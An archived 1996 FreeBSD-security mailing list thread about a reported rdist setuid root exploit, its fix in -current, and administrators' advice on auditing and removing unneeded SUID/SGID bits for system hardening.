owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA26044 for security-outgoing; Mon, 15 Jul 1996 03:18:17 -0700 (PDT) Received: from orion.webspan.net (root@orion.webspan.net [206.154.70.41]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA26037 for ; Mon, 15 Jul 1996 03:18:14 -0700 (PDT) Received: from localhost (gpalmer@localhost [127.0.0.1]) by orion.webspan.net (8.7.5/8.6.12) with SMTP id GAA03592; Mon, 15 Jul 1996 06:18:05 -0400 (EDT) X-Authentication-Warning: orion.webspan.net: Host gpalmer@localhost [127.0.0.1] didn't use HELO protocol To: -Vince- cc: jbhunt , freebsd-security@freebsd.org, root@mercury.gaianet.net From: "Gary Palmer" Subject: Re: New EXPLOIT located! In-reply-to: Your message of "Mon, 15 Jul 1996 01:21:07 PDT." Date: Mon, 15 Jul 1996 06:18:05 -0400 Message-ID: <3588.837425885@orion.webspan.net> Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote in message ID : > > You *HAVE* applied the rdist patch(es), or better yet, DISABLED rdist > > totally, haven't you? > Only took out the setuid flag... Have the patches been applied to > the latest -current since I just recompiled rdist from the latest > -current sources... Huh? rdist shouldn't be vunerable if it HAS had the setuid bit removed... (unless I really am mis-understanding something) Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jul 15 03:38:54 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id DAA27298 for security-outgoing; Mon, 15 Jul 1996 03:38:54 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id DAA27289; Mon, 15 Jul 1996 03:38:52 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id DAA03747; Mon, 15 Jul 1996 03:38:48 -0700 (PDT) Date: Mon, 15 Jul 1996 03:38:48 -0700 (PDT) From: -Vince- To: Gary Palmer cc: jbhunt , freebsd-security@freebsd.org, root@mercury.gaianet.net Subject: Re: New EXPLOIT located! In-Reply-To: <3588.837425885@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 15 Jul 1996, Gary Palmer wrote: > -Vince- wrote in message ID > : > > > You *HAVE* applied the rdist patch(es), or better yet, DISABLED rdist > > > totally, haven't you? > > > Only took out the setuid flag... Have the patches been applied to > > the latest -current since I just recompiled rdist from the latest > > -current sources... > > Huh? rdist shouldn't be vunerable if it HAS had the setuid bit > removed... (unless I really am mis-understanding something) Hmmm, even with the setuid bit, his exploit doesn't work anymore... I guess the sources for July 14th really changed it cause it can't find distfile for rdist any longer... Vince From owner-freebsd-security Mon Jul 15 05:56:12 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA04861 for security-outgoing; Mon, 15 Jul 1996 05:56:12 -0700 (PDT) Received: from umbc7.umbc.edu (pauld@f-umbc7.umbc.edu [130.85.3.7]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id FAA04855 for ; Mon, 15 Jul 1996 05:56:08 -0700 (PDT) Received: (from pauld@localhost) by umbc7.umbc.edu (8.6.12/Umbc) id IAA23804; Mon, 15 Jul 1996 08:56:04 -0400 Date: Mon, 15 Jul 1996 08:56:04 -0400 (EDT) From: Paul Danckaert To: jbhunt cc: freebsd-security@freebsd.org, root@mercury.gaianet.net Subject: Re: New EXPLOIT located! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Thats the exact exploit posted days ago to Bugtraq, line for line. It was verified to work on most of the different BSD-based Oses. To get around it, strip the suid bit off, or run the USC rdist, which doesn't care about the suid bit. We run it here since, in addition to not being suid root, we can use it easily with ssh for doing (more) secure rdists.. The normal policy we use when setting up machines here is to do a find for suid and sgid files on the system. Pick off the essential ones, and strip the bits off any others. Its saved us from several irix and sun holes in the past.. and one or two bsd ones now too. paul From owner-freebsd-security Mon Jul 15 07:46:04 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA14418 for security-outgoing; Mon, 15 Jul 1996 07:46:04 -0700 (PDT) Received: from dada.kaizen.net (dada.kaizen.net [206.27.236.38]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA14413 for ; Mon, 15 Jul 1996 07:45:59 -0700 (PDT) Received: from localhost by dada.kaizen.net via SMTP (940816.SGI.8.6.9/940406.SGI.AUTO) id KAA01819; Mon, 15 Jul 1996 10:43:16 -0400 Date: Mon, 15 Jul 1996 10:43:11 -0400 (EDT) From: Mike Newell To: Paul Danckaert cc: jbhunt , freebsd-security@freebsd.org, root@mercury.gaianet.net Subject: Re: New EXPLOIT located! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 15 Jul 1996, Paul Danckaert wrote: > The normal policy we use when setting up machines here is to do a find > for suid and sgid files on the system. Pick off the essential ones, and > strip the bits off any others. Its saved us from several irix and sun > holes in the past.. and one or two bsd ones now too. What do you consider "essential ones"? I realize that a case-by-case analysis of the pros/cons of what to/not keep SUID would be a book in itself [:-)], especially since the usefulness of each is dependent on what the system is being used for. However it would be nice to know what utilities *must* be SUID for a baseline system, and especially what utilities are "safely" SUID and what aren't. Thanks, Mike From owner-freebsd-security Mon Jul 15 08:00:47 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA15551 for security-outgoing; Mon, 15 Jul 1996 08:00:47 -0700 (PDT) Received: from umbc7.umbc.edu (pauld@f-umbc7.umbc.edu [130.85.3.7]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA15537 for ; Mon, 15 Jul 1996 08:00:40 -0700 (PDT) Received: (from pauld@localhost) by umbc7.umbc.edu (8.6.12/Umbc) id LAA09641; Mon, 15 Jul 1996 11:00:24 -0400 Date: Mon, 15 Jul 1996 11:00:23 -0400 (EDT) From: Paul Danckaert To: Mike Newell cc: jbhunt , freebsd-security@freebsd.org, root@mercury.gaianet.net Subject: Re: New EXPLOIT located! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 15 Jul 1996, Mike Newell wrote: > On Mon, 15 Jul 1996, Paul Danckaert wrote: > > > The normal policy we use when setting up machines here is to do a find > > for suid and sgid files on the system. Pick off the essential ones, and > > strip the bits off any others. Its saved us from several irix and sun > > holes in the past.. and one or two bsd ones now too. > > What do you consider "essential ones"? I realize that a case-by-case > analysis of the pros/cons of what to/not keep SUID would be a book in > itself [:-)], especially since the usefulness of each is dependent on what > the system is being used for. However it would be nice to know what > utilities *must* be SUID for a baseline system, and especially what > utilities are "safely" SUID and what aren't. Well, the case-by-case basis of it makes it sort of difficult to come up with a real list. Some things I am unsure of, since I don't know if they will adversely affect the system.. but in general PPP/slip (ppp{,d}, sliplogin) Multicast (mrinfo,mrtrace) SuidPerl (sperl*, suidperl*) Rdist (I run usc's rdist) timed (timedc.. I run xntpd anyway.) mount_* commands If its a server box, and doesn't have to be very user friendly, I take a more restrictive approach and nuke things like at{,q,rm}, lock, and things like that. Now, I'm sure that most of these are safe.. however, if they are not necessary for the system to run, and I don't use them, I don't see the point of leaving them suid root. After all, I can make them suid later if I need them.. One question I do have, on an unrelated topic, is if people have a way of setting up a box so people can't just ^C the boot, and get a root prompt? Perhaps putting a trap in the rc scripts, or something else? paul From owner-freebsd-security Mon Jul 15 08:01:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id IAA15612 for security-outgoing; Mon, 15 Jul 1996 08:01:55 -0700 (PDT) Received: from tombstone.sunrem.com (tombstone.sunrem.com [206.81.134.54]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id IAA15606; Mon, 15 Jul 1996 08:01:53 -0700 (PDT) Received: (from brandon@localhost) by tombstone.sunrem.com (8.6.12/8.6.12) id JAA25329; Mon, 15 Jul 1996 09:01:15 -0600 Date: Mon, 15 Jul 1996 09:01:15 -0600 (MDT) From: Brandon Gillespie To: Gary Palmer cc: freebsd-security@FreeBSD.ORG Subject: Minimal SUID/SGID programs list? (was: Re: New EXPLOIT located!) In-Reply-To: <2172.837420659@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 15 Jul 1996, Gary Palmer wrote: > > find / -fstype ufs \( -perm -u+s -or -perm -g+s \) -print > > will get you a list of all locally installed SUID / SGID binaries. Does anybody have a list of the minimal SUID/SGID programs needed? I could easilly start removing bits everywhere, but the server I would like to do it on needs to stay UP without problems.. I can go back later and set the programs I need personally back to suid, but what does the OS need? -Brandon Gillespie From owner-freebsd-security Mon Jul 15 11:08:46 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA27718 for security-outgoing; Mon, 15 Jul 1996 11:08:46 -0700 (PDT) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.eu.org [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id LAA27712; Mon, 15 Jul 1996 11:08:42 -0700 (PDT) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.eu.org [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id UAA07699; Mon, 15 Jul 1996 20:08:35 +0200 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id UAA14028; Mon, 15 Jul 1996 20:07:55 +0200 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.Alpha.5/keltia-uucp-2.8) id TAA03684; Mon, 15 Jul 1996 19:23:08 +0200 (MET DST) From: Ollivier Robert Message-Id: <199607151723.TAA03684@keltia.freenix.fr> Subject: Re: New EXPLOIT located! To: phk@FreeBSD.ORG (Poul-Henning Kamp) Date: Mon, 15 Jul 1996 19:23:07 +0200 (MET DST) Cc: security@FreeBSD.ORG In-Reply-To: <4865.837416101@critter.tfs.com> from Poul-Henning Kamp at "Jul 15, 96 09:35:01 am" X-Operating-System: FreeBSD 2.2-CURRENT ctm#2232 X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk It seems that Poul-Henning Kamp said: > > OK, this is the rdist hole, it's already being worked in I think. The exploit code is the same as posted in Bugtraq and BoS. I recognize the comment... -- Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 2.2-CURRENT #15: Sun Jul 14 17:33:54 MET DST 1996 From owner-freebsd-security Mon Jul 15 12:14:34 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA02678 for security-outgoing; Mon, 15 Jul 1996 12:14:34 -0700 (PDT) Received: from scapa.cs.ualberta.ca (root@scapa.cs.ualberta.ca [129.128.4.44]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id MAA02672 for ; Mon, 15 Jul 1996 12:14:29 -0700 (PDT) Received: from ve6kik by scapa.cs.ualberta.ca with UUCP id <13072-207>; Mon, 15 Jul 1996 13:14:09 -0700 Received: from alive.ampr.ab.ca by ve6kik.ampr.ab.ca with uucp (Smail3.1.28.1 #5) id m0ufsE9-000OIkC; Mon, 15 Jul 96 12:18 WET DST Received: by alive.ampr.ab.ca (Linux Smail3.1.29.1 #2) id m0ufrXi-000294C; Mon, 15 Jul 96 11:34 MDT Date: Mon, 15 Jul 1996 11:34:45 -0600 (MDT) From: Marc Slemko To: freebsd-security@FreeBSD.ORG Subject: Re: Minimal SUID/SGID programs list? (was: Re: New EXPLOIT located!) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 15 Jul 1996, Brandon Gillespie wrote: > Does anybody have a list of the minimal SUID/SGID programs needed? I > could easilly start removing bits everywhere, but the server I would like > to do it on needs to stay UP without problems.. I can go back later and > set the programs I need personally back to suid, but what does the OS need? You can have a reasonably useful system with 0 setuid programs, although a few setuid wrappers would probably make life a little happier. For most programs, taking the setuid flag off simply reduces or eliminates the functionality of the program. For some programs, that isn't a big deal since you can either just run them as root or not use them. sendmail is one of the harder programs to fiddle with so it doesn't run as root, since it actually requires thinking, but it is certainly possible. Getting rid of setgid programs can start cutting into useful utilities more, although there is little risk in having things like write setgid tty. The group of setgid programs that are the hardest to get rid of are those like ps that need access to kmem to work. I think the reason that all these programs are installed setuid by default is that every situation is different, and there are no programs which are not 'needed' by someone. This is a reasonable idea, and perhaps it is reasonable to have all programs installed in fully functional states, even if that means having them setuid or setgid. I am thinking about the idea of an interactive setup script which would display information about each setgid/setuid program, what it is used for, what happens if the setuid/setgid flag is taken off, etc. This script could then be run at setup time for initial configuration, or later for reconfiguration, and let the novice user reduce the security risks of setuid and setgid programs on their system. It is easy for people who know what they are doing to come up with a customized script that they can run on their systems, but most people don't have this ability. Consider how many serious security holes have been found in setuid programs recently. Then think of how many systems don't use most, or even all, of those programs. The concept of simply disabling things you don't need isn't new or complicated, but I don't see it being done by most people. If no one else gets there first, I may be able to find the time to start on such a script myself. -- Marc Slemko 1:342/1003@fidonet marcs@alive.ampr.ab.ca marcs@alive.ersys.edmonton.ab.ca From owner-freebsd-security Mon Jul 15 13:43:27 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA09604 for security-outgoing; Mon, 15 Jul 1996 13:43:27 -0700 (PDT) Received: from kdat.calpoly.edu (kdat.csc.calpoly.edu [129.65.54.101]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id NAA09593; Mon, 15 Jul 1996 13:43:21 -0700 (PDT) Received: (from nlawson@localhost) by kdat.calpoly.edu (8.6.12/N8) id NAA12252; Mon, 15 Jul 1996 13:43:06 -0700 From: Nathan Lawson Message-Id: <199607152043.NAA12252@kdat.calpoly.edu> Subject: Please stop CCing FreeBSD-Security To: jbhunt@mercury.gaianet.net (jbhunt) Date: Mon, 15 Jul 1996 13:43:06 -0700 (PDT) Cc: freebsd-security-notification@FreeBSD.org, freebsd-security@FreeBSD.org, root@mercury.gaianet.net In-Reply-To: from "jbhunt" at Jul 14, 96 11:52:43 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > Ok, for almost 3 weeks now we at Gaianet have been tracking root hackers > around our box. FINALLY, today at about 3 pm one of them made a BIG BIG > mistake. Fortunately, for us I was around to watch what happened and kill > the user before he was able to erase his history files and the exploit > itself. So here are the files necessary to fix whatever hole this > exploits. We run Freebsd Current so it obviously makes most freebsd > systems vulnerable to a root attack. I appreciate any help you can offer. > > John > SysAdmin Gaianet Please stop sending your local information to freebsd-security! It is not a forum to discuss your specific system's security problems. -- Nate Lawson "There are a thousand hacking at the branches of CPE Senior evil to one who is striking at the root." CSL Admin -- Henry David Thoreau, 'Walden', 1854 From owner-freebsd-security Mon Jul 15 14:11:41 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA16059 for security-outgoing; Mon, 15 Jul 1996 14:11:41 -0700 (PDT) Received: from guarany.cpd.unb.br (guarany.cpd.unb.br [164.41.2.1]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id OAA15692 for ; Mon, 15 Jul 1996 14:11:04 -0700 (PDT) Received: from antares.linf.unb.br by guarany.cpd.unb.br (AIX 3.2/UCB 5.64/4.03) id AA41856; Mon, 15 Jul 1996 18:04:12 -0300 Received: from centaurus by antares.linf.unb.br (4.1/SMI-4.1) id AA15879; Mon, 15 Jul 96 18:12:36 WST From: e8917523@antares.linf.unb.br (Daniel C. Sobral) Message-Id: <9607152212.AA15879@antares.linf.unb.br> Subject: Specific problem??? To: security@freefall.freebsd.org Date: Mon, 15 Jul 1996 18:12:35 -0400 (WST) In-Reply-To: <199607152043.NAA09614@freefall.freebsd.org> from "owner-security-digest@freefall.freebsd.org" at Jul 15, 96 01:43:30 pm Disclaimer: Klaatu Barada Nikto! X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > From: Nathan Lawson > Date: Mon, 15 Jul 1996 13:43:06 -0700 (PDT) > Subject: Please stop CCing FreeBSD-Security > > > Ok, for almost 3 weeks now we at Gaianet have been tracking root hackers > > around our box. FINALLY, today at about 3 pm one of them made a BIG BIG > > mistake. Fortunately, for us I was around to watch what happened and kill > > the user before he was able to erase his history files and the exploit > > itself. So here are the files necessary to fix whatever hole this > > exploits. We run Freebsd Current so it obviously makes most freebsd > > systems vulnerable to a root attack. I appreciate any help you can offer. > > > > John > > SysAdmin Gaianet > > Please stop sending your local information to freebsd-security! It is not a > forum to discuss your specific system's security problems. ??? I was given the impression that the problem was present, for instance, in all FreeBSD 2.1.0-R, and possibly the newly released 2.1.5-R. How does that constitue a "specific system's security problem"? -- Daniel C. Sobral (8-DCS) e8917523@linf.unb.br * Psychiatric Hospital? And everyone there is an FBI agent? * From owner-freebsd-security Mon Jul 15 14:49:51 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA19440 for security-outgoing; Mon, 15 Jul 1996 14:49:51 -0700 (PDT) Received: from rocky.mt.sri.com (rocky.mt.sri.com [206.127.76.100]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA19427 for ; Mon, 15 Jul 1996 14:49:46 -0700 (PDT) Received: (from nate@localhost) by rocky.mt.sri.com (8.7.5/8.7.3) id PAA21014; Mon, 15 Jul 1996 15:49:31 -0600 (MDT) Date: Mon, 15 Jul 1996 15:49:31 -0600 (MDT) Message-Id: <199607152149.PAA21014@rocky.mt.sri.com> From: Nate Williams To: e8917523@antares.linf.unb.br (Daniel C. Sobral) Cc: security@freefall.freebsd.org Subject: Re: Specific problem??? In-Reply-To: <9607152212.AA15879@antares.linf.unb.br> References: <199607152043.NAA09614@freefall.freebsd.org> <9607152212.AA15879@antares.linf.unb.br> Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > > Please stop sending your local information to freebsd-security! It > > is not a forum to discuss your specific system's security problems. > > ??? I was given the impression that the problem was present, for instance, > in all FreeBSD 2.1.0-R, and possibly the newly released 2.1.5-R. How does > that constitue a "specific system's security problem"? First of all, 2.1.5 doesn't have the problem. Second of all, I think the complaint was that they were asking for advice on 'local' adminstration issues such as what files to remove suid on, etc.. The administrator shows a lack of knowledge on Unix security, and reading a good security book would be better use of both their time and ours. Nate From owner-freebsd-security Mon Jul 15 17:06:51 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id RAA01758 for security-outgoing; Mon, 15 Jul 1996 17:06:51 -0700 (PDT) Received: from ultra.ultra.net.au (chaos@ultra.ultra.net.au [198.142.63.5]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id RAA01731 for ; Mon, 15 Jul 1996 17:06:41 -0700 (PDT) Received: (from chaos@localhost) by ultra.ultra.net.au (8.6.12/8.6.12) id KAA03804; Tue, 16 Jul 1996 10:12:57 +1000 Date: Tue, 16 Jul 1996 10:12:57 +1000 (EST) From: Simon Coggins To: freebsd-security@freebsd.org Subject: is there a current list of security problems in Freebsd-stable? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Is there a list of problms for the 2.1.0-R laying around somewhere ? Regards Simon +---------------------------------------------------------------+ | 2nd year Computer Systems Engineer at James Cook University | | chaos@ultra.net.au, eng-sc@jcu.edu.au, chaos@oz.org | | Chaos @ Undernet http://www.ultra.net.au/~chaos | | Irc Operator for Wollongong.oz.org & Sydney.oz.org | +---------------------------------------------------------------+ From owner-freebsd-security Mon Jul 15 19:36:40 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA19339 for security-outgoing; Mon, 15 Jul 1996 19:36:40 -0700 (PDT) Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA19323; Mon, 15 Jul 1996 19:36:34 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by post.io.org (8.7.5/8.7.3) with SMTP id WAA06200; Mon, 15 Jul 1996 22:36:24 -0400 (EDT) Date: Mon, 15 Jul 1996 22:36:24 -0400 (EDT) From: Brian Tao To: Poul-Henning Kamp cc: FREEBSD-SECURITY-L Subject: suidness of /usr/bin/login In-Reply-To: <4914.837416816@critter.tfs.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 15 Jul 1996, Poul-Henning Kamp wrote: > > Make a list of them all, remove setuid on any you don't use. Consider > carefully the minimum permissions you can get away with on the rest. Does /usr/bin/login need to be setuid root? Since it is normally only called by telnetd (which already runs as root), does it have to be setuid root as well? What else uses it? xterm (which itself is also setuid root)? -- Brian Tao (BT300, taob@io.org, taob@ican.net) Senior Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" From owner-freebsd-security Mon Jul 15 19:37:25 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA19422 for security-outgoing; Mon, 15 Jul 1996 19:37:25 -0700 (PDT) Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA19414 for ; Mon, 15 Jul 1996 19:37:19 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by post.io.org (8.7.5/8.7.3) with SMTP id WAA06204; Mon, 15 Jul 1996 22:37:02 -0400 (EDT) Date: Mon, 15 Jul 1996 22:37:02 -0400 (EDT) From: Brian Tao To: -Vince- cc: FREEBSD-SECURITY-L Subject: Re: New EXPLOIT located! In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 15 Jul 1996, -Vince- wrote: > > Hmmm, even with the setuid bit, his exploit doesn't work anymore... > I guess the sources for July 14th really changed it cause it can't find > distfile for rdist any longer... Nate Williams commited the changes on July 12. -- Brian Tao (BT300, taob@io.org, taob@ican.net) Senior Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" From owner-freebsd-security Mon Jul 15 21:08:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA28796 for security-outgoing; Mon, 15 Jul 1996 21:08:36 -0700 (PDT) Received: from kechara.flame.org (kechara.flame.org [192.80.44.209]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA28753; Mon, 15 Jul 1996 21:08:06 -0700 (PDT) Received: from zhaneel.flame.org (zhaneel.flame.org [192.80.44.210]) by kechara.flame.org (8.7.5/8.6.9) with ESMTP id AAA08373; Tue, 16 Jul 1996 00:07:30 -0400 (EDT) Received: (from explorer@localhost) by zhaneel.flame.org (8.7.5/8.6.9) id AAA00281; Tue, 16 Jul 1996 00:07:26 -0400 (EDT) To: Brian Tao Cc: Poul-Henning Kamp , FREEBSD-SECURITY-L Subject: Re: suidness of /usr/bin/login References: From: Michael Graff Date: 16 Jul 1996 00:07:25 -0400 In-Reply-To: Brian Tao's message of Mon, 15 Jul 1996 22:36:24 -0400 (EDT) Message-ID: Lines: 14 X-Mailer: Gnus v5.2.33/Emacs 19.31 Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Brian Tao writes: > Does /usr/bin/login need to be setuid root? Since it is normally > only called by telnetd (which already runs as root), does it have to > be setuid root as well? What else uses it? xterm (which itself is > also setuid root)? Users? you can always use ``login foo'' and that is supposed to let someone else log in, kinda in mid session and all. --Michael From owner-freebsd-security Mon Jul 15 21:37:34 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id VAA01748 for security-outgoing; Mon, 15 Jul 1996 21:37:34 -0700 (PDT) Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id VAA01743 for ; Mon, 15 Jul 1996 21:37:29 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by post.io.org (8.7.5/8.7.3) with SMTP id AAA07487; Tue, 16 Jul 1996 00:37:14 -0400 (EDT) Date: Tue, 16 Jul 1996 00:37:14 -0400 (EDT) From: Brian Tao To: Michael Graff cc: FREEBSD-SECURITY-L Subject: Re: suidness of /usr/bin/login In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On 16 Jul 1996, Michael Graff wrote: > > you can always use ``login foo'' and that is supposed to let someone else > log in, kinda in mid session and all. Hmmm... that's hardly ever done, at least around here. "exec telnet localhost" would serve the same purpose, I guess. -- Brian Tao (BT300, taob@io.org, taob@ican.net) Senior Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" From owner-freebsd-security Tue Jul 16 01:32:23 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA24173 for security-outgoing; Tue, 16 Jul 1996 01:32:23 -0700 (PDT) Received: from solar.tlk.com (root@solar.tlk.com [194.97.84.34]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id BAA24152; Tue, 16 Jul 1996 01:32:16 -0700 (PDT) Received: by solar.tlk.com id ; Tue, 16 Jul 96 10:32 MET DST Message-Id: From: torstenb@solar.tlk.com (Torsten Blum) Subject: Re: suidness of /usr/bin/login To: taob@io.org (Brian Tao) Date: Tue, 16 Jul 1996 10:32:07 +0200 (MET DST) Cc: phk@freebsd.org, freebsd-security@freebsd.org Reply-To: torstenb@freefall.freebsd.org In-Reply-To: from Brian Tao at "Jul 15, 96 10:36:24 pm" Reply-To: torstenb@tlk.com X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Brian Tao wrote: > Does /usr/bin/login need to be setuid root? Since it is normally > only called by telnetd (which already runs as root), does it have to > be setuid root as well? What else uses it? xterm (which itself is > also setuid root)? Better make xterm work without beeing suid root. xterm is more complex than login. -tb From owner-freebsd-security Tue Jul 16 07:34:23 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA28367 for security-outgoing; Tue, 16 Jul 1996 07:34:23 -0700 (PDT) Received: from gatekeeper.fsl.noaa.gov (gatekeeper.fsl.noaa.gov [137.75.131.181]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA28362; Tue, 16 Jul 1996 07:34:19 -0700 (PDT) Received: from emu.fsl.noaa.gov (kelly@emu.fsl.noaa.gov [137.75.60.32]) by gatekeeper.fsl.noaa.gov (8.7.5/8.7.3) with ESMTP id OAA26815; Tue, 16 Jul 1996 14:34:18 GMT Message-Id: <199607161434.OAA26815@gatekeeper.fsl.noaa.gov> Received: by emu.fsl.noaa.gov (1.40.112.4/16.2) id AA106977688; Tue, 16 Jul 1996 08:34:48 -0600 Date: Tue, 16 Jul 1996 08:34:48 -0600 From: Sean Kelly To: taob@io.org Cc: phk@freebsd.org, freebsd-security@freebsd.org In-Reply-To: (message from Brian Tao on Mon, 15 Jul 1996 22:36:24 -0400 (EDT)) Subject: Re: suidness of /usr/bin/login Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk >>>>> "Brian" == Brian Tao writes: Brian> Does /usr/bin/login need to be setuid root? Since it Brian> is normally only called by telnetd (which already runs as Brian> root), does it have to be setuid root as well? What else Brian> uses it? getty also uses it. And in general, users are capable of typing exec /usr/bin/login to terminate one login session and start another, on the same tty/pty. In fact, csh/tcsh has a builtin `login' which does the exec. To offer this feature, it needs to be setuid-root. -- Sean Kelly NOAA Forecast Systems Laboratory kelly@fsl.noaa.gov Boulder Colorado USA http://www-sdd.fsl.noaa.gov/~kelly/ From owner-freebsd-security Tue Jul 16 07:39:43 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA28770 for security-outgoing; Tue, 16 Jul 1996 07:39:43 -0700 (PDT) Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id HAA28762; Tue, 16 Jul 1996 07:39:38 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org 